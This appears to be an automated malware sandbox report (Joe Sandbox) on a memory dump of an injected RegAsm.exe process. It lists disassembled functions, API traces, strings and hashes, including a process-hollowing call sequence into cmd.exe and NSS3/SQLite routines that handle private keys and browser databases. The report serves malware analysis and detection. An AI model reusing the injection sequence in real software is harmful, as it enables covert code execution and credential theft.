Instruction Fuzzy Hash: 6F713EB19002289BDF20EF60DD49ACD77B9AF49315F0004EAA609B3151EB76AFC5CF59

Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

/, xrefs: 0041C525
UT, xrefs: 0041C79D

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99

Function 6CA21C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6CA21C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CA21C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CA21CA1
GetLengthSid.ADVAPI32(?), ref: 6CA21CA9
malloc.MOZGLUE(00000000), ref: 6CA21CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6CA21CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CA21CE4
GetLengthSid.ADVAPI32(?), ref: 6CA21CEC
malloc.MOZGLUE(00000000), ref: 6CA21CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6CA21D0F
CloseHandle.KERNEL32(?), ref: 6CA21D17
AllocateAndInitializeSid.ADVAPI32 ref: 6CA21D4D
GetLastError.KERNEL32 ref: 6CA21D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CA21D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CA21D7A

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: 0e7a3f7149538d5b4a069d6918371c920da23aa9da3656880a6c05450935cc67
Instruction ID: 94a83a3021a7709a90f30987d1742a83c56156e2321739ae0f63e34f1e8e99c5
Opcode Fuzzy Hash: 0e7a3f7149538d5b4a069d6918371c920da23aa9da3656880a6c05450935cc67
Instruction Fuzzy Hash: 853181F1A01218AFEF10AF64DD48BAA7BB8FF4A304F044165F609A3650E7349984CF65

Function 6CA23D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CA23DFB
__allrem.LIBCMT ref: 6CA23EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA23FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6CA24047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA240DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA2415F
__allrem.LIBCMT ref: 6CA2416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA24288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA242AB
__allrem.LIBCMT ref: 6CA242B7

Strings

%03d, xrefs: 6CA242E8
%04d, xrefs: 6CA2407B
%lld, xrefs: 6CA23FB2
%02d, xrefs: 6CA24086

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: 398fd2ac4951e2bd4f67fd66acdf8a93113019c54455d4ca3840a599be8c9b7d
Instruction ID: 77c257748c65182b74807b34aab9b3547f1d340d5fa1e59de9ce047646ca1d39
Opcode Fuzzy Hash: 398fd2ac4951e2bd4f67fd66acdf8a93113019c54455d4ca3840a599be8c9b7d
Instruction Fuzzy Hash: 1EF10371A087509FD715CF38C881B6AB7FAAF86308F188A1DF49597A51E738D4C58B42

Function 0040F54A Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F57C
CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,004365A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040F5A0
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040F5B2
GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
ResumeThread.KERNEL32(?), ref: 0040F608
WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
SetThreadContext.KERNEL32(?,00000000), ref: 0040F696
ResumeThread.KERNEL32(?), ref: 0040F69F

Strings

a-A, xrefs: 0040F550, 0040F620
C:\Windows\System32\cmd.exe, xrefs: 0040F59B

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
String ID: C:\Windows\System32\cmd.exe$a-A
API String ID: 3621800378-431432405
Opcode ID: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
Instruction ID: 0d24e25234c3a3ad141f65fc29eb95852bfeeab9a63bd67a8dcfe51b88e854c0
Opcode Fuzzy Hash: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
Instruction Fuzzy Hash: B5413872A00208AFEB11DFA4DC85FAAB7B9FF48705F144475FA01E6161E776AD448B24

Function 6C9D1C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9D1D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D1EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C9D1FB7

Strings

table, xrefs: 6C9D1C8B
abort due to ROLLBACK, xrefs: 6C9D2223
sqlite_temp_master, xrefs: 6C9D1C5C
unsupported file format, xrefs: 6C9D2188
sqlite_master, xrefs: 6C9D1C61
attached databases must use the same text encoding as main database, xrefs: 6C9D20CA
no more rows available, xrefs: 6C9D2264
unknown error, xrefs: 6C9D2291
another row available, xrefs: 6C9D2287
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C9D1F83

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: 28db06cb701ed56e5b0f1e244fb086e08afbafbbd4c9670d995b0361827c7352
Instruction ID: 78b2b13991b63409c466ef8e31cab06659acfea82c9490906cbc992dcc7aeb67
Opcode Fuzzy Hash: 28db06cb701ed56e5b0f1e244fb086e08afbafbbd4c9670d995b0361827c7352
Instruction Fuzzy Hash: D312CB71608A419FD704CF19C084A1AB7E6BF86318F1AC96DE895ABB11D731FC46CB92

Function 6CACDE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6CAA7FFA,00000000,?,6CAD23B9,00000002,00000000,?,6CAA7FFA,00000002), ref: 6CACDE33

Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF90AB
Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF90C9
Part of subcall function 6CAF9090: EnterCriticalSection.KERNEL32 ref: 6CAF90E5
Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF9116
Part of subcall function 6CAF9090: LeaveCriticalSection.KERNEL32 ref: 6CAF913F

Part of subcall function 6CACD000: PORT_ZAlloc_Util.NSS3(00000108,?,6CACDE74,6CAA7FFA,00000002,?,?,?,?,?,00000000,6CAA7FFA,00000000,?,6CAD23B9,00000002), ref: 6CACD008

PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6CAA7FFA,00000000,?,6CAD23B9,00000002,00000000,?,6CAA7FFA,00000002), ref: 6CACDE57
memset.VCRUNTIME140(?,00000000,00000088), ref: 6CACDEA5
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CACE069
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CACE121
PK11_FreeSymKey.NSS3(?), ref: 6CACE14F
PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6CACE195
PR_GetCurrentThread.NSS3 ref: 6CACE1FC

Part of subcall function 6CAC2460: PR_SetError.NSS3(FFFFE005,00000000,6CB67379,00000002,?), ref: 6CAC2493

Strings

application data, xrefs: 6CACDFE0
early application data, xrefs: 6CACDFC9
handshake data, xrefs: 6CACDFF7
key, xrefs: 6CACE046

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
String ID: application data$early application data$handshake data$key
API String ID: 1461918828-2699248424
Opcode ID: 318bca06503c5e341b4aaef170d1228e2fde8f0e8567ecb9754bef7b7f44ddcc
Instruction ID: 7fcbc87dfd601b5544ef1d0de4d69b3905aca755a6be1348d255a52b37006e7a
Opcode Fuzzy Hash: 318bca06503c5e341b4aaef170d1228e2fde8f0e8567ecb9754bef7b7f44ddcc
Instruction Fuzzy Hash: BEC1F675B402059FDB04CF69CD81BAAB7B5FF09318F084129E9099BA51E731E9D4CBE2

Function 6CA5FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CA5FD06

Part of subcall function 6CA5F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CA5F696
Part of subcall function 6CA5F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CA5F789
Part of subcall function 6CA5F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CA5F796
Part of subcall function 6CA5F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CA5F79F
Part of subcall function 6CA5F670: SECITEM_DupItem_Util.NSS3 ref: 6CA5F7F0

Part of subcall function 6CA83440: PK11_GetAllTokens.NSS3 ref: 6CA83481
Part of subcall function 6CA83440: PR_SetError.NSS3(00000000,00000000), ref: 6CA834A3
Part of subcall function 6CA83440: TlsGetValue.KERNEL32 ref: 6CA8352E
Part of subcall function 6CA83440: EnterCriticalSection.KERNEL32(?), ref: 6CA83542
Part of subcall function 6CA83440: PR_Unlock.NSS3(?), ref: 6CA8355B

SECITEM_DupItem_Util.NSS3(?), ref: 6CA5FDAD

Part of subcall function 6CA8FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA39003,?), ref: 6CA8FD91
Part of subcall function 6CA8FD80: PORT_Alloc_Util.NSS3(A4686CA9,?), ref: 6CA8FDA2
Part of subcall function 6CA8FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CA9,?,?), ref: 6CA8FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CA5FE00

Part of subcall function 6CA8FD80: free.MOZGLUE(00000000,?,?), ref: 6CA8FDD1

Part of subcall function 6CA7E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA7E5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA5FEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6CA5FEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CA5FED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA5FF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA5FF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CA5FF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA5FFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CA60007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CA60029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA60044

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: b2fd3b4c9c9d7e6ce2017c9d10f5f20eee3f582b6b2bfc1cfe6fa8cd74833e2b
Instruction ID: e7fc82e77c6a6220e9896fa3874b406624a713a3e1b33dd30e65aef3b462b68f
Opcode Fuzzy Hash: b2fd3b4c9c9d7e6ce2017c9d10f5f20eee3f582b6b2bfc1cfe6fa8cd74833e2b
Instruction Fuzzy Hash: A7B1A571604301AFE714CF29CC40A6AB7E5FF88308F598A1DF999C7A41E771E998CB91

Function 6CA57D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6CA57DDC

Part of subcall function 6CA907B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA38298,?,?,?,6CA2FCE5,?), ref: 6CA907BF
Part of subcall function 6CA907B0: PL_HashTableLookup.NSS3(?,?), ref: 6CA907E6
Part of subcall function 6CA907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA9081B
Part of subcall function 6CA907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA90825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CA57DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CA57F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6CA57F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CA57F98
PK11_FreeSymKey.NSS3(?), ref: 6CA57FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA57FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CA58000

Part of subcall function 6CA79430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CA57F0C,?,00000000,00000000,00000000,?), ref: 6CA7943B
Part of subcall function 6CA79430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CA7946B
Part of subcall function 6CA79430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CA79546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA58110
PK11_FreeSymKey.NSS3(00000000), ref: 6CA5811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CA5822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA5823C

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: 298719a463ee0db3e5f4c89408c49ffa847108716a57a5a179b4bf96872457de
Instruction ID: 0fa80c82bf5fce1298c0dadf5a64c62c78bab7cc4a2628140d30896fd1ccf5fb
Opcode Fuzzy Hash: 298719a463ee0db3e5f4c89408c49ffa847108716a57a5a179b4bf96872457de
Instruction Fuzzy Hash: 19C16DB1D502199FEB21CF14CD40BEAB7B9AB05308F44C1A9E91DB6641E7319ED9CFA0

Function 6CA60EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CA60F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CA60FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CA61006
PK11_FreeSymKey.NSS3(?), ref: 6CA6101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA61033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA6103F
PK11_FreeSymKey.NSS3(00000000), ref: 6CA61048
memcpy.VCRUNTIME140(?,?,?), ref: 6CA6108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CA610BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CA610D6
memcpy.VCRUNTIME140(?,?,?), ref: 6CA6112E

Part of subcall function 6CA61570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CA608C4,?,?), ref: 6CA615B8
Part of subcall function 6CA61570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CA608C4,?,?), ref: 6CA615C1
Part of subcall function 6CA61570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA6162E
Part of subcall function 6CA61570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA61637

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 13eb5ce9c77b55a7d62a70eff4e027ee9e482e61a19abb78cd366728cc7e2423
Instruction ID: f3e8ae751296e3778bd181c60006287537a8f3565cb1f9cac24dcdbc21abc498
Opcode Fuzzy Hash: 13eb5ce9c77b55a7d62a70eff4e027ee9e482e61a19abb78cd366728cc7e2423
Instruction Fuzzy Hash: 0071D1B1A042459FDB00CFA6CD85A7AFBB0FF44318F19862DE61997B11E731D988CB91

Function 6CA81CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6CA81F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6CA82166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6CA8228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6CA823B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA8241C

Strings

model, xrefs: 6CA823CB, 6CA823EC
serial, xrefs: 6CA822A2
manufacturer, xrefs: 6CA82179
token, xrefs: 6CA81F2C

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: c25f5180d9276121f0e99840e73250ff595147f61eb794bd1a8954069188e8b3
Instruction ID: 810ba06c41083c1bb7c508cb484f291f65bdff267e7f70647066e7dc8a7598fc
Opcode Fuzzy Hash: c25f5180d9276121f0e99840e73250ff595147f61eb794bd1a8954069188e8b3
Instruction Fuzzy Hash: 4F02F072D0D7C86FF7328671C44C3E76AE09B45728F5C166EC6EE46683C3A899C98351

Function 6CA86C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA31C6F,00000000,00000004,?,?), ref: 6CA86C3F

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CA31C6F,00000000,00000004,?,?), ref: 6CA86C60
PR_ExplodeTime.NSS3(00000000,6CA31C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CA31C6F,00000000,00000004,?,?), ref: 6CA86C94

Strings

gfff, xrefs: 6CA86D66
gfff, xrefs: 6CA86CFD
gfff, xrefs: 6CA86D30
gfff, xrefs: 6CA86CF5
gfff, xrefs: 6CA86D9C

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
